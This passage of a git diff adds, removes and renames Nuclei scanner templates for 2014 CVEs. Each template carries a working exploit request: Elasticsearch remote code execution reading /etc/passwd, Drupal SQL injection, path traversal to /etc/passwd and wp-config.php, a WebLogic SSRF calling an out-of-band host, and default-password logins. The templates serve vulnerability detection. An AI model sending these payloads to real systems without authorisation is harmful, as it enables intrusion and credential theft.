+ - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
+ - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
+ - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "application/pdf"
+ - 'filename="dompdf_out.pdf"'
+ part: header
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/CVE-2014-3120.yaml b/nuclei-templates/CVE-2014/CVE-2014-3120.yaml
new file mode 100644
index 0000000000..c48d236345
--- /dev/null
+++ b/nuclei-templates/CVE-2014/CVE-2014-3120.yaml
@@ -0,0 +1,65 @@
+id: CVE-2014-3120
+
+info:
+ name: ElasticSearch v1.1.1/1.2 RCE
+ author: pikpikcu
+ severity: critical
+ description: |
+ The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
+ - https://www.elastic.co/blog/logstash-1-4-3-released
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-3120
+ - http://bouk.co/blog/elasticsearch-rce/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
+ cve-id: CVE-2014-3120
+ tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic
+ metadata:
+ max-request: 1
+
+http:
+ - raw:
+ - |
+ POST /_search?pretty HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Accept-Language: en
+ Content-Type: application/x-www-form-urlencoded
+
+ {
+ "size": 1,
+ "query": {
+ "filtered": {
+ "query": {
+ "match_all": {
+ }
+ }
+ }
+ },
+ "script_fields": {
+ "command": {
+ "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
+ }
+ }
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/CVE-2014-3704.yaml b/nuclei-templates/CVE-2014/CVE-2014-3704.yaml
deleted file mode 100644
index 0a54df0161..0000000000
--- a/nuclei-templates/CVE-2014/CVE-2014-3704.yaml
+++ /dev/null
@@ -1,49 +0,0 @@
-id: CVE-2014-3704
-
-info:
- name: Drupal SQL Injection
- author: princechaddha
- severity: high
- description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.
- reference:
- - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql
- - https://nvd.nist.gov/vuln/detail/CVE-2014-3704
- - https://www.drupal.org/SA-CORE-2014-005
- - https://www.exploit-db.com/exploits/34984
- - https://www.exploit-db.com/exploits/34992
- - https://www.exploit-db.com/exploits/34993
- - https://www.exploit-db.com/exploits/35150
- remediation: Upgrade to Drupal core 7.32 or later.
- classification:
- cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
- cvss-score: 7.5
- cve-id: CVE-2014-3704
- cwe-id: CWE-89
- metadata:
- max-request: 1
- shodan-query: http.component:"drupal"
- tags: edb,cve,cve2014,drupal,sqli
-
-variables:
- num: "999999999"
-
-http:
- - method: POST
- path:
- - "{{BaseURL}}/?q=node&destination=node"
- body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "PDOException"
- - '{{md5({{num}})}}'
- condition: and
- part: body
-
- - type: status
- status:
- - 500
-
-# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/CVE-2014-4210.yaml b/nuclei-templates/CVE-2014/CVE-2014-4210.yaml
new file mode 100644
index 0000000000..1c82fab373
--- /dev/null
+++ b/nuclei-templates/CVE-2014/CVE-2014-4210.yaml
@@ -0,0 +1,38 @@
+id: CVE-2014-4210
+
+info:
+ name: Oracle Weblogic - SSRF in SearchPublicRegistries.jsp
+ author: princechaddha
+ severity: medium
+ description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
+ reference:
+ - https://www.oracle.com/security-alerts/cpujul2014.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
+ - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
+ - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
+ cvss-score: 5
+ cve-id: CVE-2014-4210
+ cwe-id: NVD-CWE-noinfo
+ tags: cve,cve2014,weblogic,oracle,ssrf,oast
+ metadata:
+ max-request: 1
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/cve-2014-4513.yaml b/nuclei-templates/CVE-2014/CVE-2014-4513.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/cve-2014-4513.yaml
rename to nuclei-templates/CVE-2014/CVE-2014-4513.yaml
diff --git a/nuclei-templates/CVE-2014/cve-2014-4592.yaml b/nuclei-templates/CVE-2014/CVE-2014-4592.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/cve-2014-4592.yaml
rename to nuclei-templates/CVE-2014/CVE-2014-4592.yaml
diff --git a/nuclei-templates/CVE-2014/CVE-2014-4940.yaml b/nuclei-templates/CVE-2014/CVE-2014-4940.yaml
new file mode 100644
index 0000000000..13f17a9af9
--- /dev/null
+++ b/nuclei-templates/CVE-2014/CVE-2014-4940.yaml
@@ -0,0 +1,32 @@
+id: CVE-2014-4940
+
+info:
+ name: WordPress Plugin Tera Charts - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4940
+ - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail=
+ - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/
+ classification:
+ cve-id: CVE-2014-4940
+ tags: cve,cve2014,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/CVE-2014-4942.yaml b/nuclei-templates/CVE-2014/CVE-2014-4942.yaml
new file mode 100644
index 0000000000..3bfce6456b
--- /dev/null
+++ b/nuclei-templates/CVE-2014/CVE-2014-4942.yaml
@@ -0,0 +1,34 @@
+id: CVE-2014-4942
+info:
+ name: WP EasyCart - Information Disclosure
+ author: DhiyaneshDk
+ severity: low
+ description: |
+ The EasyCart (wp-easycart) plugin before 2.0.6 for WordPress allows remote attackers to obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.
+ reference:
+ - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150
+ - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4942
+ tags: cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "PHP Extension"
+ - "PHP Version"
+ condition: and
+ - type: status
+ status:
+ - 200
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '>PHP Version <\/td>
([0-9.]+)'
diff --git a/nuclei-templates/CVE-2014/CVE-2014-5111.yaml b/nuclei-templates/CVE-2014/CVE-2014-5111.yaml
deleted file mode 100644
index f8a4d0004a..0000000000
--- a/nuclei-templates/CVE-2014/CVE-2014-5111.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2014-5111
-
-info:
- name: Fonality trixbox - Directory Traversal
- author: daffainfo
- severity: high
- description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
- reference:
- - https://www.exploit-db.com/exploits/39351
- - https://nvd.nist.gov/vuln/detail/CVE-2014-5111
- - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html
- classification:
- cve-id: CVE-2014-5111
- tags: cve,cve2014,lfi,trixbox
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/CVE-2014-5258.yaml b/nuclei-templates/CVE-2014/CVE-2014-5258.yaml
new file mode 100644
index 0000000000..78a3979930
--- /dev/null
+++ b/nuclei-templates/CVE-2014/CVE-2014-5258.yaml
@@ -0,0 +1,33 @@
+id: CVE-2014-5258
+
+info:
+ name: webEdition 6.3.8.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-5258
+ - https://www.exploit-db.com/exploits/34761
+ - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html
+ - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0
+ classification:
+ cve-id: CVE-2014-5258
+ tags: cve,cve2014,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/25
diff --git a/nuclei-templates/CVE-2014/CVE-2014-5368.yaml b/nuclei-templates/CVE-2014/CVE-2014-5368.yaml
deleted file mode 100644
index 2856a69401..0000000000
--- a/nuclei-templates/CVE-2014/CVE-2014-5368.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: CVE-2014-5368
-
-info:
- name: WordPress Plugin WP Content Source Control - Directory Traversal
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2014-5368
- - https://www.exploit-db.com/exploits/39287
- - https://www.cvedetails.com/cve/CVE-2014-5368
- - http://seclists.org/oss-sec/2014/q3/417
- classification:
- cve-id: CVE-2014-5368
- tags: cve,cve2014,wordpress,wp-plugin,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "DB_NAME"
- - "DB_PASSWORD"
- part: body
- condition: and
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/25
diff --git a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml b/nuclei-templates/CVE-2014/CVE-2014-8799.yaml
deleted file mode 100644
index b462c7325c..0000000000
--- a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: CVE-2014-8799
-
-info:
- name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2014-8799
- - https://www.exploit-db.com/exploits/35346
- - https://www.cvedetails.com/cve/CVE-2014-8799
- - https://wordpress.org/plugins/dukapress/changelog/
- classification:
- cve-id: CVE-2014-8799
- tags: cve,cve2014,wordpress,wp-plugin,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "DB_NAME"
- - "DB_PASSWORD"
- - "DB_USER"
- - "DB_HOST"
- part: body
- condition: and
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/25
diff --git a/nuclei-templates/CVE-2014/cve-2014-9606.yaml b/nuclei-templates/CVE-2014/CVE-2014-9606.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/cve-2014-9606.yaml
rename to nuclei-templates/CVE-2014/CVE-2014-9606.yaml
diff --git a/nuclei-templates/CVE-2014/cve-2014-9607.yaml b/nuclei-templates/CVE-2014/CVE-2014-9607.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/cve-2014-9607.yaml
rename to nuclei-templates/CVE-2014/CVE-2014-9607.yaml
diff --git a/nuclei-templates/CVE-2014/CVE-2014-9614.yaml b/nuclei-templates/CVE-2014/CVE-2014-9614.yaml
new file mode 100644
index 0000000000..b71a33cd9c
--- /dev/null
+++ b/nuclei-templates/CVE-2014/CVE-2014-9614.yaml
@@ -0,0 +1,47 @@
+id: CVE-2014-9614
+
+info:
+ name: Netsweeper 4.0.5 - Default Weak Account
+ author: daffainfo
+ severity: critical
+ description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
+ reference:
+ - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-9614
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2014-9614
+ cwe-id: CWE-798
+ tags: cve,cve2021,netsweeper,default-login
+
+requests:
+ - raw:
+ - |
+ POST /webadmin/auth/verification.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}/webadmin/start/
+
+ login=branding&password=branding&Submit=Login
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+
+ - type: word
+ part: header
+ words:
+ - 'Location: ../common/'
+ - 'Location: ../start/'
+ condition: or
+
+ - type: word
+ part: header
+ words:
+ - 'Set-Cookie: webadminU='
+
+# Enhanced by mp on 2022/02/25
diff --git a/nuclei-templates/CVE-2014/CVE-2014-9618.yaml b/nuclei-templates/CVE-2014/CVE-2014-9618.yaml
new file mode 100644
index 0000000000..189837b5af
--- /dev/null
+++ b/nuclei-templates/CVE-2014/CVE-2014-9618.yaml
@@ -0,0 +1,40 @@
+id: CVE-2014-9618
+
+info:
+ name: Netsweeper - Authentication Bypass
+ author: daffainfo
+ severity: critical
+ description: |
+ The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
+ reference:
+ - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-9618
+ - https://www.exploit-db.com/exploits/37933/
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2014-9618
+ cwe-id: CWE-287
+ tags: cve,cve2014,netsweeper,auth-bypass
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="'
+ - 'placeholder="Profile Manager">'
+ - 'Netsweeper WebAdmin'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/10
diff --git a/nuclei-templates/CVE-2014/cve-2014-10037.yaml b/nuclei-templates/CVE-2014/cve-2014-10037.yaml
new file mode 100644
index 0000000000..7acb0d68b5
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-10037.yaml
@@ -0,0 +1,27 @@
+id: CVE-2014-10037
+
+info:
+ name: DomPHP 0.83 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/30865
+ - https://www.cvedetails.com/cve/CVE-2014-10037
+ tags: cve,cve2014,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2014/CVE-2014-2321.yaml b/nuclei-templates/CVE-2014/cve-2014-2321.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/CVE-2014-2321.yaml
rename to nuclei-templates/CVE-2014/cve-2014-2321.yaml
diff --git a/nuclei-templates/CVE-2014/cve-2014-2383.yaml b/nuclei-templates/CVE-2014/cve-2014-2383.yaml
deleted file mode 100644
index 1586860d75..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-2383.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2014-2383
-
-info:
- name: Arbitrary file read in dompdf < v0.6.0
- author: 0x_Akoko
- severity: high
- reference: https://www.exploit-db.com/exploits/33004
- tags: cve,cve2014,dompdf,lfi
- metadata:
- win-payload: "/dompdf.php?input_file=C:/windows/win.ini"
- unix-payload: "/dompdf.php?input_file=/etc/passwd"
- description: "dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter."
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
- - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
- - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
- - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/pdf"
- - 'filename="dompdf_out.pdf"'
- part: header
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2014/cve-2014-3120.yaml b/nuclei-templates/CVE-2014/cve-2014-3120.yaml
deleted file mode 100644
index 2e3eb0f6e1..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-3120.yaml
+++ /dev/null
@@ -1,54 +0,0 @@
-id: CVE-2014-3120
-
-info:
- name: ElasticSearch v1.1.1/1.2 RCE
- author: pikpikcu
- severity: critical
- description: |
- The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
- reference:
- - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
- - https://www.elastic.co/blog/logstash-1-4-3-released
- tags: cve,cve2014,elastic,rce,elasticsearch
-
-requests:
- - raw:
- - |
- POST /_search?pretty HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Accept-Language: en
- Content-Type: application/x-www-form-urlencoded
-
- {
- "size": 1,
- "query": {
- "filtered": {
- "query": {
- "match_all": {
- }
- }
- }
- },
- "script_fields": {
- "command": {
- "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
- }
- }
- }
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/json"
- part: header
-
- - type: regex
- regex:
- - "root:.*:0:0"
- part: body
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2014/cve-2014-3704.yaml b/nuclei-templates/CVE-2014/cve-2014-3704.yaml
new file mode 100644
index 0000000000..883f72ee3c
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-3704.yaml
@@ -0,0 +1,32 @@
+id: CVE-2014-3704
+info:
+ name: Drupal Sql Injetion
+ author: princechaddha
+ severity: high
+ description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
+ reference:
+ - https://www.drupal.org/SA-CORE-2014-005
+ - http://www.exploit-db.com/exploits/34984
+ - http://www.exploit-db.com/exploits/34992
+ - http://www.exploit-db.com/exploits/34993
+ - http://www.exploit-db.com/exploits/35150
+ tags: cve,cve2014,drupal,sqli
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/?q=node&destination=node"
+ body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 500
+
+ - type: word
+ words:
+ - "PDOException"
+ - "e807f1fcf82d132f9bb018ca6738a19f"
+ condition: and
+ part: body
diff --git a/nuclei-templates/CVE-2014/cve-2014-4210.yaml b/nuclei-templates/CVE-2014/cve-2014-4210.yaml
deleted file mode 100644
index 96c90f1486..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-4210.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2014-4210
-
-info:
- name: Weblogic SSRF in SearchPublicRegistries.jsp
- author: princechaddha
- severity: medium
- tags: cve,cve2014,weblogic,oracle,ssrf,oast
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
- description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services."
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
- words:
- - "http"
diff --git a/nuclei-templates/CVE-2014/CVE-2014-4536.yaml b/nuclei-templates/CVE-2014/cve-2014-4536.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/CVE-2014-4536.yaml
rename to nuclei-templates/CVE-2014/cve-2014-4536.yaml
diff --git a/nuclei-templates/CVE-2014/CVE-2014-4561.yaml b/nuclei-templates/CVE-2014/cve-2014-4561.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/CVE-2014-4561.yaml
rename to nuclei-templates/CVE-2014/cve-2014-4561.yaml
diff --git a/nuclei-templates/CVE-2014/cve-2014-4940.yaml b/nuclei-templates/CVE-2014/cve-2014-4940.yaml
deleted file mode 100644
index a2d4666d76..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-4940.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2014-4940
-
-info:
- name: WordPress Plugin Tera Charts - Directory Traversal
- author: daffainfo
- severity: high
- description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
- reference: https://www.cvedetails.com/cve/CVE-2014-4940
- tags: cve,cve2014,wordpress,wp-plugin,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2014/cve-2014-4942.yaml b/nuclei-templates/CVE-2014/cve-2014-4942.yaml
deleted file mode 100644
index bfad79553c..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-4942.yaml
+++ /dev/null
@@ -1,58 +0,0 @@
-id: CVE-2014-4942
-
-info:
- name: WordPress EasyCart <2.0.6 - Information Disclosure
- author: DhiyaneshDk
- severity: medium
- description: |
- WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.
- impact: |
- An attacker can gain sensitive information from the target system.
- remediation: |
- Upgrade to WordPress EasyCart version 2.0.6 or later.
- reference:
- - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150
- - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942
- - https://nvd.nist.gov/vuln/detail/CVE-2014-4942
- - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail=
- classification:
- cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
- cvss-score: 5
- cve-id: CVE-2014-4942
- cwe-id: CWE-200
- epss-score: 0.01024
- epss-percentile: 0.82199
- cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:*
- metadata:
- max-request: 1
- vendor: levelfourdevelopment
- product: wp-easycart
- framework: wordpress
- tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "PHP Extension"
- - "PHP Version"
- condition: and
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - '>PHP Version <\/td> | ([0-9.]+)'
-# digest: 490a004630440220342dce47a8408c74a401ff37d16e9bdac22e456deb97b98dd0c3c7b4b7daed5702206190335d1ce1d1991a9d8e91c114329267ce0095e548d99dd945e381ab003da3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2014/cve-2014-5111.yaml b/nuclei-templates/CVE-2014/cve-2014-5111.yaml
new file mode 100644
index 0000000000..36a72b9429
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-5111.yaml
@@ -0,0 +1,27 @@
+id: CVE-2014-5111
+
+info:
+ name: Fonality trixbox - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
+ reference: |
+ - https://www.exploit-db.com/exploits/39351
+ - https://www.cvedetails.com/cve/CVE-2014-5111
+ tags: cve,cve2014,lfi,trixbox
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
